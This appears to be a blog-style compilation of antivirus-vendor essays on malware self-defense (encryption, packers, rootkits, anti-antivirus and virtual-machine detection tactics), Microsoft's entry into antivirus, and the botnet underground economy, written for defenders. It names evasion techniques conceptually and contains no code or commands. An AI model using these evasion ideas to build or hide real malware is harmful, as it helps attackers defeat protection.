First we must define the meaning of the term “malware self-defense", which is not as unequivocal as it may seem at first glance. When malware attacks antivirus programs, this is clearly a form of self defense. When malware covering its tracks, this is also in some sense a form of self defense, although less obviously so. An even less obvious form of self defense is the very evolution of malicious programs. After all, one of the motivations behind virus writers searching for new platforms that can be infected and for new system loopholes is to spread new viruses in the wild, into areas where no one yet bothers to look for malicious code as nothing has been found there before.

In order to avoid confusion about what is considered a self-defense technology and what is not, this article examines only the most popular and obvious means of malware self-defense. First and foremost this includes various means of modifying and packing code, in order to conceal the presence of malicious code in the system and to disrupt the functionality of antivirus solutions.

Classifying malware self defense
Sources: polymorphism, obfuscation and encryption
Stealth viruses
Packers
Rootkits
Combating antivirus solutions
What will the future bring?
Trends and forecasts
Conclusion
Classifying malware self defense
There are many different kinds of malware self-defense techniques and these can be classified in a variety of ways. Some of these technologies are meant to bypass antivirus signature databases, while others are meant to hinder analysis of the malicious code. One malicious program may attempt to conceal itself in the system, while another will not waste valuable processor resources on this, choosing instead to search for and counter specific types of antivirus protection. These different tactics can be classified in different ways and put into various categories.

As the goal of this article is not to create a strict classification system for malware self-defense techniques, let's consider a classification system that will provide an understanding of this issue at an intuitive level. We take the two criteria which we believe are the most important, and from there we will create a scatterplot with two axes representing those two criteria.

The first criterion is a malicious program's level of self-defense activity. The most passive malware does not attempt to defend itself in any way, i.e. it does not contain any such code. Instead, the author creates a kind of protective shell for the program. More active self-defense systems involve deliberately aggressive techniques.

The second criterion is the degree to which a malicious program's self-defense mechanism is dedicated. The most narrowly dedicated forms of self defense are found in malicious programs that somehow disrupt the function of a specific antivirus program. More general self-defense mechanisms are designed to defend malicious programs against everything by making the virus presence in the system as undetectable as possible in every way.

We have used a scatterplot to present the different kinds of malware self-defense mechanisms. This diagram is merely a simple example that we can use as a guide to categorize different means of malware self-defense. This model is based on a careful analysis of malware behaviors, but is, necessarily, subjective.

Figure 1. A scatterplot of malware self-defense technologies

Malware self-defense mechanisms can fulfil one or more tasks. These include:

hindering detection of a virus using signature-based methods;
hindering analysis of the code by virus analysts;
hindering detection of a malicious program in the system;
hindering the functionality of security software such as antivirus programs and firewalls.
This article will only examine malicious programs written for the Windows operating system (and its predecessor, DOS) due to the rarity and relatively small number of malicious programs for other platforms. All of the trends examined in this article that apply to executable malware files (EXE, DLL and SYS), and to some extent also apply to macro viruses and script viruses, which is why I will not be addressing the latter separately.

Sources: polymorphism, obfuscation and encryption
It makes sense to examine polymorphism, obfuscation and encryption together, as they all fulfill the same end, albeit to different degrees. Initially, modification of malicious code had two goals: to make it more difficult to detect files and to make it more difficult for virus analysts to examine the code.

The history of malware began in the 1970s, but the history of malware self-defense didn’t start until the late 1980s. The first virus that attempted to defend itself from the antivirus utilities then in existence was the DOS virus Cascade (Virus.DOS.Cascade). It defended itself by partially encrypting its own code. This wasn’t very successful, however, since each new copy of the virus - despite being unique from previous copies - still contained an unaltered piece of code that gave it away every time. As a result, antivirus programs could still detect it. Nevertheless, virus writers were turning in a new direction, and in two years the first polymorphic virus appeared: Chameleon (Virus.DOS.Chameleon). Chameleon, also known as 1260, and its contemporary Whale, used complex encryption and obfuscation methods to protect their code. Two years later, we saw the emergence of so-called polymorphic generators, which could be used as out of the box defense solutions for malicious programs.

Why code modification can be used to hinder file detection, and how file detection works, needs some explanation.

Until recently, antivirus programs worked exclusively by analysis file code. The earliest signature-based detection methods focused on searching for exact byte sequences, often at a fixed offset from the beginning of the file, in a malicious program's binary code. Later heuristic detection methods also used file code, but with a more flexible, probability based approach to searching for common malware byte sequences. Obviously, it’s not difficult for malicious programs to get around that kind of protection if each copy of the program includes a new byte sequence.

This task is fulfillled by the application of polymorphic and metamorphic techniques, which essentially - without getting into the technological nitty-gritty – enable a malicious program to mutate at byte level when the program creates a copy of itself. Meanwhile, the program’s functionality remains unchanged. Encryption and obfuscation are primarily used to hinder code analysis, but when they are implemented in a certain way, the result can be a variation of polymorphism – an example here is again Cascade, where every copy of the virus was encrypted with a unique key. Obfuscation may just hinder analysis, but when it is applied in a different way to every copy of a malicious program, it hinders the effective use of signature-based detection methods. However, it cannot be said that any one of the abovementioned tactics is more effective than any other in terms of malware self-defense. It would be more correct to say that the effectiveness of these techniques depends on the specific circumstances and how the techniques are implemented.

The use of polymorphism only became relatively widespread in terms of DOS file viruses. There's a reason for this. Writing polymorphic code is a highly time-consuming task that is really only justified in cases when a malicious program is self-replicating: then each new copy contains a more or less unique byte sequence. The majority of contemporary Trojans aren't able to self-replication, and polymorphism is therefore irrelevant. That’s why since the end of the DOS file virus era, polymorphism has been seen less, and it was used mostly by virus writers who wanted to show off their skills rather than to create a particularly useful malicious function.

Figure 2. The polymorphic code of P2P-Worm.Win32.Polip

In contrast, obfuscation continues to be used today, as are other code modification methods that, to a large extent, make it more difficult to analyze code as opposed to hindering detection.

Figure 3. A diagram of the obfuscated code in Trojan-Dropper.Win32.Small.ue

Since behavioral detection methods arrived and began to squeeze out signature-based methods, code modification techniques have become less useful in hindering malware detection. This is why polymorphism and related technologies are not commonly used today and are only really a means for hindering the actual analysis of malicious code.

Stealth viruses
Concealing malicious programs in the system became the second method of self-defense against detection that was mastered by virus writers in the DOS era. This technique was first used in 1990; to be more precise, it was included in the arsenal of a virus we have already mentioned - Whale. Essentially, the concealed virus would one way or another intercept DOS system services and pass false data to the user or the antivirus program – for instance, "clean" boot sector contents, instead of the real contents which had been infected by the malicious program.

Stealth technologies for the DOS operating system were reborn as rootkit technologies for the Windows operating system 10 years later.

The mechanisms used to conceal viruses in the system are covered in more detail in the Rootkit section.

Packers
Gradually, viruses - malicious programs that can function only within a victim body and which are unable to exist as a separate file - are being replaced by Trojans, which are fully independent malicious programs. This process began when the Internet was still slow and more limited than it is today. Hard disks and floppy disks were small, which meant that the size of a program was very important. In order to reduce the size of a Trojan, virus writers began to utilize so-called packers - even back in the DOS era. Packers are dedicated programs that compress and archive files.

A side effect of using packers that can actually be useful from a malware point of view is that packed malicious programs are more difficult to detect using file methods.

When creating a new modification of an existing malicious program, the virus writer usually changes several lines of code, while leaving the heart of the program untouched. In the compiled file, the bytes for a certain sequence of code will also be altered and if the antivirus signature does not include that very sequence, then the malicious program will still be detected as before. Compressing a program with a packer solves this problem as changing even just one byte in the source executable results in an entirely new byte sequence in the packed file.

Figure 4. The visible difference between packed and unpacked code

Packers are still commonly used today. The variety of packing programs and their level of sophistication continue to grow. Many modern packers, in addition to compressing a source file, also equip it with additional self-defense functions aimed at hindering the unpacking and analysis of the file using a debugger.

Rootkits
Malicious programs for the Windows operating system started using stealthing technologies to hide their presence in the system in the first years of the new millennium. As mentioned above, this was approximately 10 years after stealthing programs appeared as a concept and was implemented for DOS. In early 2004, Kaspersky Lab encountered a surprising program that couldn't be seen in the Windows processes and files list. For many antivirus experts, this was a new beginning – understanding stealthing technologies for malicious programs for Windows – and it was the harbinger of a major new trend in the virus writing industry.

The term “rootkit” stems from Unix utilities that are designed to provide a user with unsanctioned root access within the system without being noticed by the system administrator. Today, the word rootkit covers dedicated utilities used to conceal information in the system, as well as malicious programs with functionality which enables them to mask their presence. These include the manifestations of any third-party registered applications: a string in the list of processes, a file on disk, a registry key or even network traffic.

How do rootkit technologies which are designed to conceal malicious programs in the system make it so difficult to detect the malicious programs using antivirus or other security software? It’s very simple: an antivirus utility is an external agent just like the user. Generally, if a user can't see something, then an antivirus program can't see it either. However, some antivirus solutions implement technologies which sharpen their vision, enabling them to detect rootkits when users cannot see them.

A rootkit is based on the same principle as DOS stealth viruses. A large number of rootkits have mechanisms which modify a chain of system calls (Execution Path Modification). This kind of rootkit may act as an hook located at a certain point of a route along which commands or information are exchanged. It will modify these commands or information in order to distort them or control what happens on the recipient's end without the recipient's knowledge. Theoretically, the number of points at which a hook can be located is limitless. In practice, there are currently several different methods commonly used to hook APIs and kernel system functions. Examples of this kind of rootkit include the widely known utilities Vanquish and Hacker Defender and malicious programs such as Backdoor.Win32.Haxdoor, Email-Worm.Win32.Mailbot, and certain versions of Email-Worm.Win32.Bagle.

Figure 5. Hooking ZwQueryDirectoryFile conceals
the driver file in the list of files

Another common type of rootkit technology is Direct Kernel Object Modification (DKOM), which can be viewed as an insider that modifies information or commands directly in their sources. These rootkits alter system data. A typical example is the FU utility; the same functions can be found in Gromozon (Trojan.Win32.Gromp).

A newer technology that officially corresponds to the rootkit classification conceals files in alternate data streams (ADS) in NTFS file systems. This technology was first implemented in 2000 in the malicious program Stream (Virus.Win32.Stream), and got a second wind in 2006 in the form of Mailbot and Gromozon. Strictly speaking, exploiting ADS is not so much a means of tricking the system as of taking advantage of little-known functions, which is why this particular technology isn't likely to become very widespread.

Figure 6. The malicious program Mailbot (Rustock) exploits
the system directory stream

There is another rare technology which only partially falls into the rootkit category (but it corresponds even less to the other classes of malware self-defense examined in this article). This technology uses bodiless files - this means malicious programs do not have any body whatsoever on the disk. There are currently two known representatives of this subgroup: Codered, which emerged in 2001 (Net-Worm.Win32.CodeRed) which exists in this form only within the context of MS IIS, and a recent proof of concept Trojan that stores its body in the registry.

The modern rootkit trend aims towards the virtualization and use of system functions – in other words, penetrating even more deeply into the system.

Combating antivirus solutions
There have always been malicious programs that have actively defended themselves. Self-defense mechanisms include:

Performing a targeted search of the system for an antivirus product, firewall or other security utility, followed by disrupting the functioning of that utility. An example might be a malicious program that searches for a specific antivirus product in the process list and subsequently attempts to disrupt the functioning of that antivirus.
Blocking files and opening them with exclusive access as a counter measure against file scanning by the antivirus.
Modifying the hosts file in order to block access to antivirus update sites.
Detecting query messages sent by the security system (for example, a firewall window with an inquiry such as "Allow this connection?") and imitating a click on the "Allow" button.
Actually, a targeted attack against a security solution is more similar to the reaction of someone pushed up against a wall rather than an active attack. In today’s conditions, when antivirus companies analyze more than the code contained in malicious programs - they analyze their behavior as well –malicious programs are more or less powerless. Neither polymorphism, nor packers, nor even stealth technologies will provide malicious programs with total protection. This is why malware has set its sights on certain manifestations or functions of the so-called enemy. Of course, sometimes self-defense mechanisms are the only solution; otherwise they would not be so common, as they pose too many disadvantages from the viewpoint of maximum, full-range defense.

What will the future bring?
Antivirus protection is continually evolving, moving from file analysis to program behavior analysis. In contrast to file analysis, the basics of which were explained in the section on polymorphism and obfuscation, behavior analysis is based not on working with files, but with events at system level, such as "list all active system processes," "create a file with this name in the directory shown," and "open the port indicated to incoming data." By analyzing the chain of these events, an antivirus program can calculate the extent to which the component generating these processes is potentially malicious, and give a warning when necessary.

However, behavior analysis can get confusing when it comes to terminology, and it's not always easy to get things straightened out. For example, a behavioral analyzer may go by different names: HIPS, proactive protection, heuristic, or sandbox… However, regardless of the term, one thing remains clear: malicious programs are ultimately powerless in the face of behavioral analysis. This vulnerability will probably have an influence on the future evolution of malicious programs.

In other words, virus writers are faced with the need to somehow work around behavior analyzers. There is no way to know how they will go about tackling this obstacle. But we do know, for example, that the use of obfuscation at the behavioral level is basically ineffective. The evolution of environmental diagnostics, however, is very interesting. This is because it assumes, in part, a rise in a virus's "self-awareness", which would allow it to determine where exactly it is located: in the "real world" (in a user's clean working environment) or in the "matrix" (under the control of antivirus analysis).

Diagnostic technologies do have their precedents: some malicious programs, if they are launched in a virtual environment (such as VMWare or Virtual PC) destroy themselves immediately. By building this self-destruction mechanism into a malicious program, its author prevents its analysis, which is often conducted within a virtual environment.

Trends and forecasts
Having examined current trends and how effective current approaches are, we can expect the following from the methods of malware self-defense discussed above:

Rootkits are moving towards exploiting equipment functions and towards virtualization. This method, however, has not yet reached its peak and probably won’t become a major threat in the years to come, nor will it be widely used.
Technology which blocks files on disk: there are two known proof of concept programs that have demonstrated we can expect this area to develop in the near future.
The use of obfuscation technologies is insignificant, but nevertheless still current.
The use of technologies that detect security utilities and interrupt their performance is very common and widely used.
The use of packers is widespread and is growing steadily (both in quantative and qualitative terms).
The use of technologies that detect debuggers, emulators and virtual machines as well as other environmental diagnostic technologies, is expected to develop in order to compensate for the mass transition of antivirus products to behavioral analysis.

Figure 7. An approximate breakdown of malware self-defense
technologies as of early 2007

It’s not difficult to see that the evolution trends in malware self-defense technologies are changing in step with the evolution of malicious programs themselves, as well as protection against malware. When most malicious programs infected files and antivirus programs used signature-based detection, the most prevalent forms of malware self-defense were polymorphism and code protection. Today, malicious programs are mostly independent, and antivirus programs are becoming increasingly proactive. Based on these facts, we can predict which malware self-defense mechanisms will develop more intensively than others:

Rootkits. Their invisibility within a system gives them a clear advantage - even if it doesn’t prevent their detection. We can most likely expect new kinds of bodiless malicious programs and, a little later, the implementation of virtualization technologies.
Obfuscation and encryption. This method will remain common as long is it continues to hinder code analysis.
Technologies used to counter security solutions which are based on behavioral analysis. We can expect the appearance of some new technologies, since the ones that are currently being used (targeted attacks against antivirus programs) are not effective. It's possible that we will see some methods of detecting virtual environments or a type of behavioral encryption.
Conclusion
What else can we say in conclusion? The mere existence of malicious programs has led to the existence and development of protection against them. And now we will see the emergence and development of malware self-defense against protection against malware. This brings up images of a never-ending conflict, where nature is red in tooth and claw.

In the last few years the situation has become increasingly critical. Someone from the cybercriminal underground (or “researchers” dressed in white hats) develops proof of concept code to evade modern means of protection. This person will, for self-promotion purposes and feigning concern about progress, announce that the code is “undetectable”. But we need to emphasize that this concept will be undetectable only at the level of one- or two-step bypass of known security functions, rather than 100% undetectable. It is relatively easy to create a one-step work-around if you are familiar with protection mechanisms.

Such publications cause concern among a certain percentage of users who are not familiar with the way malicious programs and antivirus programs work ("Will my antivirus protect me against this new type of threat?"). In this situation, the people creating self-defense methods have only to chip in a share of their resources in order to restore their reputation and develop a work-around - usually a one-step bypass. In the end, their reputation is saved (of course), the malware - antivirus - user system returns to its initial state, and we are again faced with the same vicious cycle. Each new iteration gives rise to even more sophisticated malware and more heavyweight means of defense.

I want to emphasize that this process uses up a lot of resources, is senseless and endless, and recently, it has become even more exaggerated. All three parties in this conflict need to raise their awareness of the situation. I urge users to expand their understanding, to acknowledge that no means of protection can provide 100% security, and the best way to protect yourself against threats is to prevent them. I challenge conceptualists to reconsider their intentions and motives behind publishing a PoC that will only add fuel to the fire. And I call on the "protectors" to force themselves to think outside the box, and to try to keep more than one step ahead of the enemy. We may not be able to see the end of this so-called arms race, but we can keep it from spiraling out of control.

--------------------------------------------------------------------------------

* Polymorphism — a technology that allows a self-replicating program to fully or partially modify its outward appearance and/or the structure of its code during the replication process.

* Obfuscation — a combination of approaches used to obscure the source code of a program. This is designed to make the code as difficult as possible to read and analyze it while retaining full functionality. Obfuscation technologies can be applied at the level of any programming language (including high level, script and assembler languages). Examples of very simple obfuscation include adding neutral instructions (which do not alter program functionality) to the code or making the code harder to read by using an excessive number of unconditional skips (or unconditional changeovers disguised as conditional skips).

* This is a reference to a couple of terms used in computer security jargon: a Black Hat (a malicious hacker) and a White Hat (a security professional who uses hacking techniques for legal, ethical ends).

Managing Protection>

Usability at the Forefront
Microsoft representatives are pushing Forefront as a highly usable system for monitoring and managing all network nodes. Of course, Microsoft made its name by developing products which concentrate on usability. I have no doubt that Forefront will live up to expectations in this area. However, there are several issues relating to the release of Forefront which will worry security professionals.

My main concern in reading the related PR was that the focus is mainly on manageability versus security. I find this very worrisome indeed.

Manageability is of course a key issue in a security solution, but in my opinion, it can't replace quality detection. If a solution can't detect threats, there will be nothing left to manage. Given that threats today are specifically designed to evade detection for as long as possible, quality of detection has to be at the forefront in choosing a product. You need an anti-virus solution that detects threats. First and foremost. Managing the solution is definitely secondary.

Certification vs. Comparatives
I was astonished when I read that Margaret Arakawa, senior director of Security and Access Product Management at Microsoft, was reported as saying that the myriad tests such as AV-Comparative.org's don't matter to the industry—rather, what matters are the two standards for certification that OneCare has in fact passed: West Coast Labs and ICSA Labs.

Given that independent testing is routinely conducted in all industries where the security of the end user is at stake – medicine, the automotive industry, airplane construction, etc. – this is a very odd statement. Independent tests are necessary simply because different companies produce goods and services to different standards. When it comes to information security, testing the quality of solutions is crucial: malware is not only becoming more and more sophisticated, but it's also increasingly designed to make money for well-organized cyber criminals. Independent tests should effectively evaluate detection rates, the speed of response to new threats, the resources required to run each solution, and the stability of the solution itself.

Testing bodies provide either certification tests (such as West Coast Labs, ICSA Labs), or comparative tests, where products compete against each other (such as AV-Test.org and AV-Comparatives.org). Some organizations provide a combination, such as Virus Bulletin which offers the VB100% award and also publishes the results of comparative tests. Certification confirms that a given solution meets or exceeds the minimum requirements of a test; in the AV world, certification guarantees a certain standard of AV functionality and the ability to detect the test viruses. Comparative tests, on the other hand, go further and evaluate the qualitative difference between products that have been acknowledged as meeting basic requirements in an imperfect world. Naturally, we can debate about testing methods and find fault with the methodology of any given testing organization. However, I think we, as a collective industry, agree that independent tests are crucial for the AV industry; both in terms of keeping vendors on their toes and in giving consumers a reasonably unbiased view of how available solutions compare against each other.

Microsoft, or at least Margaret Arakawa, appears to be asserting that independent tests don't matter. And people who follow Microsoft agree: for instance, Michael Cherry, an analyst with Directions on Microsoft, said "The criteria may not be how good signature files are in the future. Frankly, they're not that far off from each other [as it is]. [The other companies who participated in the tests that OneCare flunked] didn't do so well themselves in those tests.” Poor excuse.

More Than Just Detection
In the meantime, all the well-regarded comparative tests prove that AV products differ greatly in terms of detection rate, reaction speed to new threats, quality of proactive protection, strain on system’s resources and other parameters. Moreover, there are no visible signs that the difference is getting any smaller. In fact, in many areas (for instance, response speed) the gap is widening. This is true even in terms of the oldest standard used in comparing AV solutions – signature-based detection rates. Sadly, it seems that the expanding onslaught of cybercrime is accelerating at a much faster rate than the ability of many in the anti-virus industry to keep up.

And the size of an organization doesn't guarantee success in the AV industry. Experience is key, size is not. A successful AV vendor needs professionals who are capable of combating current threats, predicting future trends and second-guessing the virus writers who've transformed themselves into an industry.

Microsoft has enormous in-house experience in developing complex solutions that are user friendly and easy to manage. I am sure that Forefront Client Security will prove a highly usable, flexible solution for small and medium sized companies. But none of this will matter if Forefront fails to detect Trojans hiding in the network that are stealing passwords, transmitting confidential data to third parties etc. Wearing a bullet proof vest is not a fashion statement – it means that you want to survive in a critical situation. And it seems as if Microsoft has forgotten this important little detail in developing Forefront Client Security. It’s an unfortunate precedent.

Anti-Virus Mechanism Industry>

Over the past few years, the antivirus industry has undergone some major changes. The market leader has changed (McAfee has lost ground to Symantec), some independent antivirus companies have either disappeared from the market or have been taken over (the Romanian company RAV and the Australian company VET), and new players (BitDefender, ClamAV) have appeared. However, before discussing this, the following factors should be highlighted:

This article only deals with ‘standard’ antivirus solutions: for home computers, workstations, corporate file and mail servers. Arguably, antivirus solutions for smartphones could be included in this list examine. Virus attacks targeting mobile phones may not be particularly common at the moment but the situation is likely to change radically - for the worse, naturally - in the next few years. This article does not examine at hardware solutions (such as gateways, routers with integrated virus scanning capability), or solutions for large UNIX systems. Nor does it cover other antivirus filters which are dedicated to specific tasks.

Additionally, the discussion here is not concerned with the marketing side of the industry. Marketing undoubtedly has an influence on the market share of individual companies, but security solutions (a category which includes antivirus programs) aren’t washing powder or toothpaste. Ultimately, end users don’t choose a security solution because of the way it’s marketed.

Obviously ‘standard’ antivirus solutions will continue to evolve. In order to understand the nature of such solutions and to identify trends, we need to determine the main factors currently influencing the antivirus industry.

Factor 1: Continuing criminalization of the Internet
Any society of a certain size (such as a town or a country) includes criminal elements. Crime levels are determined by the following factors:

the size of the community (the bigger it is, the higher the number of potential and actual criminals)

the level of economic development (it's easier to earn a living by honest means in more developed countries)

the ability of law enforcement bodies (e.g. the police) to investigate crimes and imprison the perpetrators

The Internet is no exception. Its size is immense, and many of the different countries which make up part of this community are economically undeveloped. A particular cause for concern is programs which advocate ‘cheap computers for poor third world countries’) - these further encourage criminal activity on the Internet. Statistics on the number of malicious programs originating from specific countries confirm this: the world leader in virus writing is China, followed by Latin America, with Russia and Eastern European countries not far behind.

In terms of law enforcement, in the vast majority of cases investigating cybercrime is a complex task, particularly taking into account the fact that the Internet has no physical borders.

Data which falls into the three categories listed above clearly indicate that not only is the level of criminal activity on the Internet already high, but that it will also continue to increase. One piece of evidence for this statement is that the amount of crimeware has increased twofold over the past year; this indicates that criminal activity on the Internet has doubled in the same space of time. There is no reason to suppose that this growth rate will slow in the future.

The conclusion: pressure on antivirus companies will increase as they will have to analyze more and more malicious code. Companies that fail to detect new malicious programs quickly and thus leave their customers unprotected will suffer a decrease in their market share, and will not be capable of competing in this professional arms race.

Factor 2: Increased variety of malware and attack methods
Ten years ago, back in 1996, malicious programs fell into two categories: viruses and primitive Trojans. At that time, there was no such thing as malware which could be used for criminal ends. However, in the intervening decade, malware has become far more complex and varied:

network worms

a wide range of Trojan programs, including Spyware

AdWare

malicious application of legitimate programs (such as keyloggers and remote administration utilities)

a wide range of spam, from begging emails to blackmail

phishing - a clearly differentiated type of financial scam

network attacks and rackets

etc

The vast majority of malicious programs are written for Win32 systems. The number of malicious programs targeting Linux, MacOs, and smartphones (running under a variety of operating systems) is still, as yet, insignificant. There have also been a handful of PoC viruses for 64 bit systems.

The conclusion: antivirus companies have to be prepared to work with a wide variety of malware. This means not only releasing products but providing continued support: testing them, and releasing updates for the whole product range. Companies that cannot keep up with the very latest technological developments will not be able to break into new industry segments. Moreover, they will start to lose ground on their own territory, and current competitors or completely new players will take advantage of new market opportunities.

Factor 3: Microsoft
Microsoft is going to be seriously focussing on the security solutions market; this will include developing antivirus solutions. The antivirus industry is in a state of shock - everyone remembers Netscape and other independent projects, which either significantly lost market share or disappeared altogether after Microsoft produced similar products. Microsoft is planning to bring the following to the market:

antivirus for home PCs

antivirus for workstations (planned for the future)

solutions for MS Exchange (using the multi-engine Antigen from Sybari)

Of course, the appearance of this commercial giant will be a heavy blow to other manufacturers. But just how heavy will the blow be?

Users come in a range of shapes and sizes. So what factors influence them when buying an antivirus solution?

A: Commodity: the user buys the cheapest antivirus, or the most attractively packaged.

B: Branding: The user buys either a brand to which s/he has loyalty. or a branded product which has been successfully marketed.

C: Branding: the user is determined not to buy a Microsoft product. Such consumers will not trust antivirus solutions produced by this manufacturer.

D: Performance characteristics - the overall quality of the product.

It’s clear that these factors, and the types of user described, don’t exist in any pure form. The factors which influence consumer chose will be a combination of A+B+C+D in varying degrees. If we’re talking about the home user market, factor B will have a significant influence. As Antigen uses several antivirus engines (including some very good ones), the corporate market will be influenced by B+D. In order to estimate Microsoft's future market share, and the losses which other antivirus companies will correspondingly suffer, the value of A, B, C, and D needs to be determined. This is a simple task which can be fulfilled via consumer surveys.

Conclusions
As shown above, there are three deciding factors which affect the condition of the antivirus industry:

The criminalization of the Internet

Various types of criminal activity

Antivirus protection from Microsoft

The antivirus market of the future will be heavily influenced by these three factors.

So is it time to throw in the towel?
The answer to this question is unclear. We should remember Microsoft’s first attempt to create an integrated antivirus solution, MSAV for MS-DOS in 1994. This attempt was unsuccessful. It’s rare to make the same mistake twice. 12 years have passed since 1994, and a lot has changed during that time. The most important thing is that consumer demand for quality has increased: detection rates, speed of reaction to the dramatically increased number of attacks, frequency of updates, proactive technologies.

If a product is technically sound but does not offer better antivirus protection than Microsoft’s solution, it will more than likely be bought mainly by consumers influenced by factor C. If a product offers better protection than Microsoft’s antivirus together with a lower price, then it will appeal to buyers of all categories. Furthermore, if an antivirus developer’s engine is integrated into Antigen, then there is no need to worry about the future (as long as the engine continues to be used). Microsoft will not be selling the product itself, but taking a percentage from the vendor. And for Microsoft, that is the beauty of it: it can sit back and enjoy the profits (and the ideology of a “multi-engine solution" will transform the antivirus business into a trade in engines rather than products).

It will be a different, rather sorry, story for those vendors whose antivirus engines are not integrated into Antigen. On the other hand, such companies should not, perhaps, be written off; as there's no solution which can provide 100% protection against all threats, the IT market (including the antivirus market) is extremely crowded. The more troublesome a disease, the more medicines will be taken to combat it: in a similar way, users plagued by computer viruses are ready to embrace new technologies to rid themselves of the problem, and this means they will be ready to embrace a variety of solutions, not only those from the software giant. The message to antivirus companies is clear: if the company is not only to survive, but to survive profitably, compatibility issues have to be solved. Engines from different developers have to be developed with peaceful coexistence in mind (as is the case with Antigen) Another alternative is to develop double or triple layer protection against Internet threats.

The conclusion: it’s likely that things won’t turn out that badly. However, some antivirus companies will have to start cutting their budgets and thinning the ranks of their employees. Public companies will find that Microsoft’s entry to the antivirus market will impact the value of shares, and a fall in value will have the following negative consequences

It will be harder to attract investment

Employees share options will be devalued

One consequence will be that middle and senior management will desert the company.

Summary
Changes are underway in the antivirus industry and will continue for some time to come. It’s not unlikely that Microsoft’s entry to the IT security market will be a decisive factor which affects the changing situation. The software giant’s entry will undoubtedly have an impact on the best-known industry players and the current market share of antivirus companies is likely to change radically. Naturally, each company will be affected in a different way. For some, it will come as a heavy blow, while others will barely be affected and yet others will welcome Microsoft’s arrival on the market.

The most negative consequences will be felt by:

Publicly held companies
Businesses which rely on income from the market sector which Microsoft is entering
Manufacturers with engines which are inferior in quality to Microsoft’s
Manufacturers whose engines aren't used in Antigen
The brightest future awaits:

Privately held companies
Manufacturers with a broad product range
Manufacturers with a high-quality engine
Manufacturers whose engines are used in Antigen
Hopefully, the arrival of the software giant on the IT security market will have a positive impact on future developments in this field and will raise the quality of security solutions. It is to be hoped that the Internet will become a safer place as a result - every desk will not only have a computer on it, but a secure computer.

Bot Nets and Future Virtual Virus Enterprise

2008-06-07T09:26:00.000-07:00

A BotNet>

Botnets have been in existence for about 10 years; experts have been warning the public about the threat posed by botnets for more or less the same period. Nevertheless, the scale of the problem caused by botnets is still underrated and many users have little understanding of the real threat posed by zombie networks (that is, until their ISP disconnects them from the Internet, or money is stolen from their credit cards, or their email or IM account is hijacked).

A botnet is a network of computers which are infected with a malicious program that enables cybercriminals to remotely control infected computers. Malicious programs that are designed specifically for use in creating botnets are called bots.

Botnets have vast computing power. They are used as a powerful cyber weapon and are an effective tool for making money illegally. The owner of a botnet can control the computers which form the network from anywhere in the world – from another city, country or even another continent. Importantly, the Internet is structured in such a way that a botnet can be controlled anonymously.

The owner of an infected machine usually does not even suspect that the computer is being used by cybercriminals. Most zombie machines are home users’ PCs.

Botnets can be used by cybercriminals for conducting a broad range of malicious activities, from sending spam to attacking government networks.

Sending spam. This is the most common use for botnets, and is also one of the simplest. Experts estimate that over 80% of spam is sent from zombie computers. It should be noted that spam is not always sent by botnet owners: botnets are often rented by spammers.

According to our data, an average spammer makes $50,000 – $100,000 a year. Botnets made up of thousands of computers allow spammers to send millions of messages from infected machines within a very short space of time.

Blackmail. The second most popular method of making money via botnets is to use tens or even hundreds of thousands of computers to conduct DDoS (Distributed Denial of Service) attacks. This involves sending a stream of false requests from bot-infected machines to the web server under attack. As a result, the server will be overloaded and consequently unavailable. As a rule, cybercriminals demand payment from the server’s owner in return for stopping the attack.

Today, many companies work exclusively on the Internet. Downed servers bring business to a halt, resulting in financial losses. To return stability to servers as soon as possible, such companies are more likely to give in to blackmail than ask the police for help. This is exactly what cybercriminals are counting on, and DDoS attacks are becoming increasingly common.

DDoS attacks can also be used as a political tool. In such cases, attacks usually target servers belonging to government organizations. What makes such attacks particularly dangerous is that they can be used as provocation, with a cyber attack on one country being conducted from servers in another country and controlled from a third country.

Anonymous Internet access. Cybercriminals can access web servers using zombie machines and commit cybercrimes such as hacking websites or transferring stolen money. This activity, of course, appears to come from the infected machines.

Selling and leasing botnets. One option for making money illegally using botnets is based on leasing them or selling entire networks. Creating botnets for sale is also a lucrative criminal business.

Phishing. Addresses of phishing pages are often blacklisted soon after they appear. A botnet allows phishers to change the addresses of phishing pages frequently, using infected computers as proxy servers. This helps conceal the real address of the phishers' web server.

Theft of confidential data. This type of criminal activity will probably never lose its attraction for cybercriminals. Botnets help increase the haul of passwords (passwords to email and ICQ accounts, FTP resources, web services etc.) and other confidential user data by a factor of a thousand. A bot used to create a zombie network can download another malicious program, e.g., a password stealing (PSW) Trojan, and infect all the computers on the botnet with it, providing cybercriminals with passwords from all the infected computers. Stolen passwords are sold or used for mass infections of web pages (in the case of FTP account passwords) in order to further spread the bot program and expand the zombie network.

The botnet business
The answer to the question why botnets keep evolving and why they are coming to pose an increasingly serious threat lies in the underground market that has sprung up around them. Today, cybercriminals need neither specialized knowledge nor large amounts of money to get access to a botnet. The underground botnet industry provides everyone who wants to use a botnet with everything they need, including software, ready-to-use zombie networks and anonymous hosting services, at low prices

The first thing needed to create a botnet is a bot, i.e. a program that can remotely perform certain actions on a user’s computer without the user’s knowledge. Software for creating botnets can be easily purchased on the Internet by simply finding a appropriate advertisement and contacting the advertiser.

A simple web-oriented botnet requires a hosting site where a command and control center can be located. Such sites are readily available, and come complete with support and anonymous access to the server (providers of anonymous hosting services usually guarantee that log files will not be accessible to anybody, including law enforcement agencies). Advertisements like the one shown below are abundant on the Internet.

When a C&C site has been created, what’s needed next are computers infected by a bot. One option is to buy a ready-made network with somebody else’s bot installed. Since stealing botnets is a common practice, most buyers prefer to replace both the malicious programs and the command and control centers with their own, thereby gaining guaranteed control over the botnet.

Conclusion
Today, botnets are among the main sources of illegal income on the Internet and they are powerful weapons in the hands of cybercriminals. It is totally unrealistic to expect that criminals will relinquish such an effective tool. Security experts view the future with some trepidation as they anticipate the continued development of botnet technologies.

It may not only be cybercriminals who have an interest in creating international botnets. Such botnets can be used by governments or individuals to exert political pressure in tense situations. In addition, anonymous control of infected machines that does not depend on their geographic location could be used to provoke cyber conflicts. All this takes is organizing a cyber attack on one country’s servers from computers located in another country.

Networks which unite the resources of tens or hundreds of thousands or even millions of infected computers, have the potential to be extremely dangerous – a potential which (luckily!) has not yet been fully exploited. Virtually all this cyber power stems from infected home computers, which make up the overwhelming majority of zombie machines exploited by cybercriminals.

Our annual report on malware evolution in 2007, published a few months ago, contained forecasts on how the threat landscape would evolve in 2008. Now that the first three months of the year have passed, we can start to draw some preliminary conclusions.

